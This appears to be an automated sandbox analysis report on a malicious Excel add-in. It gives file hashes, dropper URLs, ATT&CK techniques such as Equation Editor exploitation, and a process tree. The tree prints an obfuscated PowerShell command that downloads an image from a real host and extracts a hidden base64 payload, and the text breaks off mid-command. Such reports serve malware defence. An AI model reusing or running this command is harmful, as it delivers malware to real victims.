8bd77dbc4d4545539e39f05f2bc150118fb9c5c43983a3eb40fc393de8440ed6

General

Target

8bd77dbc4d4545539e39f05f2bc150118fb9c5c43983a3eb40fc393de8440ed6.xlam
Size

680KB
MD5

f6c8fc6e8459c34e01e3ea58e1670563
SHA1

3d21b005c374534603a604236744505002a81b58
SHA256

8bd77dbc4d4545539e39f05f2bc150118fb9c5c43983a3eb40fc393de8440ed6
SHA512

c8f3737e4c119d267f14191f05351a079a670fff17cf9f5a85a671c9ae8c7c19873841811f713e64ccd210397d8cf12c224dec4f179af6c74ef6e73fe853bfc8
SSDEEP

12288:7abFrC4pd7ysk1A6PP2Z2KY34l/l+dc0WSUNV0e7jV7zL/1BGxuVOFTgTg5QD:7aFVjuH2ZlzXWfW5NzL/1DWgTgc

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	3016	EQNEDT32.EXE
6	2772	powershell.exe
7	2772	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2184	powershell.exe
2772	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
3016	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2204	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2184	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2204	EXCEL.EXE
2204	EXCEL.EXE
2204	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 2768	3016	EQNEDT32.EXE	33
PID 3016 wrote to memory of 2768	3016	EQNEDT32.EXE	33
PID 3016 wrote to memory of 2768	3016	EQNEDT32.EXE	33
PID 3016 wrote to memory of 2768	3016	EQNEDT32.EXE	33
PID 2768 wrote to memory of 2184	2768	WScript.exe	34
PID 2768 wrote to memory of 2184	2768	WScript.exe	34
PID 2768 wrote to memory of 2184	2768	WScript.exe	34
PID 2768 wrote to memory of 2184	2768	WScript.exe	34
PID 2184 wrote to memory of 2772	2184	powershell.exe	36
PID 2184 wrote to memory of 2772	2184	powershell.exe	36
PID 2184 wrote to memory of 2772	2184	powershell.exe	36
PID 2184 wrote to memory of 2772	2184	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8bd77dbc4d4545539e39f05f2bc150118fb9c5c43983a3eb40fc393de8440ed6.xlam
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2204

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\okayandokay.js"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀G0꠩ ⥾ ⨛ ▗ ⭀YQBn꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀VQBy꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀9꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀JwBo꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bw꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀Og꠩ ⥾ ⨛ ▗ ⭀v꠩ ⥾ ⨛ ▗ ⭀C8꠩ ⥾ ⨛ ▗ ⭀aQBh꠩ ⥾ ⨛ ▗ ⭀DY꠩ ⥾ ⨛ ▗ ⭀M꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀x꠩ ⥾ ⨛ ▗ ⭀DY꠩ ⥾ ⨛ ▗ ⭀M꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀2꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀dQBz꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀YQBy꠩ ⥾ ⨛ ▗ ⭀GM꠩ ⥾ ⨛ ▗ ⭀a꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀HY꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀cgBn꠩ ⥾ ⨛ ▗ ⭀C8꠩ ⥾ ⨛ ▗ ⭀MQ꠩ ⥾ ⨛ ▗ ⭀w꠩ ⥾ ⨛ ▗ ⭀C8꠩ ⥾ ⨛ ▗ ⭀aQB0꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bQBz꠩ ⥾ ⨛ ▗ ⭀C8꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bo꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀bwB0꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀Xw꠩ ⥾ ⨛ ▗ ⭀y꠩ ⥾ ⨛ ▗ ⭀D꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀Mg꠩ ⥾ ⨛ ▗ ⭀0꠩ ⥾ ⨛ ▗ ⭀D꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀Nw꠩ ⥾ ⨛ ▗ ⭀v꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBh꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀a꠩ ⥾ ⨛ ▗ ⭀Bu꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀agBw꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀dwBl꠩ ⥾ ⨛ ▗ ⭀GI꠩ ⥾ ⨛ ▗ ⭀QwBs꠩ ⥾ ⨛ ▗ ⭀Gk꠩ ⥾ ⨛ ▗ ⭀ZQBu꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀9꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀TgBl꠩ ⥾ ⨛ ▗ ⭀Hc꠩ ⥾ ⨛ ▗ ⭀LQBP꠩ ⥾ ⨛ ▗ ⭀GI꠩ ⥾ ⨛ ▗ ⭀agBl꠩ ⥾ ⨛ ▗ ⭀GM꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀eQBz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀ZQBt꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀TgBl꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀LgBX꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀YgBD꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀aQBl꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀aQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀ZwBl꠩ ⥾ ⨛ ▗ ⭀EI꠩ ⥾ ⨛ ▗ ⭀eQB0꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀cw꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D0꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀Hc꠩ ⥾ ⨛ ▗ ⭀ZQBi꠩ ⥾ ⨛ ▗ ⭀EM꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bgB0꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀R꠩ ⥾ ⨛ ▗ ⭀Bv꠩ ⥾ ⨛ ▗ ⭀Hc꠩ ⥾ ⨛ ▗ ⭀bgBs꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀EQ꠩ ⥾ ⨛ ▗ ⭀YQB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀K꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀Gk꠩ ⥾ ⨛ ▗ ⭀bQBh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀ZQBV꠩ ⥾ ⨛ ▗ ⭀HI꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀p꠩ ⥾ ⨛ ▗ ⭀Ds꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀G0꠩ ⥾ ⨛ ▗ ⭀YQBn꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀V꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D0꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀Bb꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀eQBz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀ZQBt꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀V꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀EU꠩ ⥾ ⨛ ▗ ⭀bgBj꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀ZwBd꠩ ⥾ ⨛ ▗ ⭀Do꠩ ⥾ ⨛ ▗ ⭀OgBV꠩ ⥾ ⨛ ▗ ⭀FQ꠩ ⥾ ⨛ ▗ ⭀Rg꠩ ⥾ ⨛ ▗ ⭀4꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀RwBl꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀UwB0꠩ ⥾ ⨛ ▗ ⭀HI꠩ ⥾ ⨛ ▗ ⭀aQBu꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀K꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀Gk꠩ ⥾ ⨛ ▗ ⭀bQBh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀ZQBC꠩ ⥾ ⨛ ▗ ⭀Hk꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀KQ꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀EY꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀9꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀8꠩ ⥾ ⨛ ▗ ⭀Dw꠩ ⥾ ⨛ ▗ ⭀QgBB꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀RQ꠩ ⥾ ⨛ ▗ ⭀2꠩ ⥾ ⨛ ▗ ⭀DQ꠩ ⥾ ⨛ ▗ ⭀XwBT꠩ ⥾ ⨛ ▗ ⭀FQ꠩ ⥾ ⨛ ▗ ⭀QQBS꠩ ⥾ ⨛ ▗ ⭀FQ꠩ ⥾ ⨛ ▗ ⭀Pg꠩ ⥾ ⨛ ▗ ⭀+꠩ ⥾ ⨛ ▗ ⭀Cc꠩ ⥾ ⨛ ▗ ⭀Ow꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀EY꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀9꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀8꠩ ⥾ ⨛ ▗ ⭀Dw꠩ ⥾ ⨛ ▗ ⭀QgBB꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀RQ꠩ ⥾ ⨛ ▗ ⭀2꠩ ⥾ ⨛ ▗ ⭀DQ꠩ ⥾ ⨛ ▗ ⭀XwBF꠩ ⥾ ⨛ ▗ ⭀E4꠩ ⥾ ⨛ ▗ ⭀R꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀+꠩ ⥾ ⨛ ▗ ⭀D4꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀Ek꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀e꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D0꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀Gk꠩ ⥾ ⨛ ▗ ⭀bQBh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀ZQBU꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀e꠩ ⥾ ⨛ ▗ ⭀B0꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀SQBu꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQB4꠩ ⥾ ⨛ ▗ ⭀E8꠩ ⥾ ⨛ ▗ ⭀Zg꠩ ⥾ ⨛ ▗ ⭀o꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀EY꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀KQ꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀ZQBu꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀SQBu꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQB4꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀PQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀aQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀ZwBl꠩ ⥾ ⨛ ▗ ⭀FQ꠩ ⥾ ⨛ ▗ ⭀ZQB4꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀LgBJ꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀TwBm꠩ ⥾ ⨛ ▗ ⭀Cg꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀BG꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀YQBn꠩ ⥾ ⨛ ▗ ⭀Ck꠩ ⥾ ⨛ ▗ ⭀Ow꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bh꠩ ⥾ ⨛ ▗ ⭀HI꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀BJ꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀t꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀t꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀BJ꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀t꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀Ek꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀e꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀Ek꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀e꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀Cs꠩ ⥾ ⨛ ▗ ⭀PQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀EY꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bh꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀LgBM꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bgBn꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀a꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀7꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀YgBh꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀2꠩ ⥾ ⨛ ▗ ⭀DQ꠩ ⥾ ⨛ ▗ ⭀T꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀ZwB0꠩ ⥾ ⨛ ▗ ⭀Gg꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀9꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀BJ꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀t꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀YQBy꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀SQBu꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQB4꠩ ⥾ ⨛ ▗ ⭀Ds꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bi꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cwBl꠩ ⥾ ⨛ ▗ ⭀DY꠩ ⥾ ⨛ ▗ ⭀N꠩ ⥾ ⨛ ▗ ⭀BD꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀bQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀PQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀aQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀ZwBl꠩ ⥾ ⨛ ▗ ⭀FQ꠩ ⥾ ⨛ ▗ ⭀ZQB4꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀LgBT꠩ ⥾ ⨛ ▗ ⭀HU꠩ ⥾ ⨛ ▗ ⭀YgBz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀cgBp꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀Zw꠩ ⥾ ⨛ ▗ ⭀o꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀cwB0꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cgB0꠩ ⥾ ⨛ ▗ ⭀Ek꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀e꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀s꠩ ⥾ ⨛ ▗ 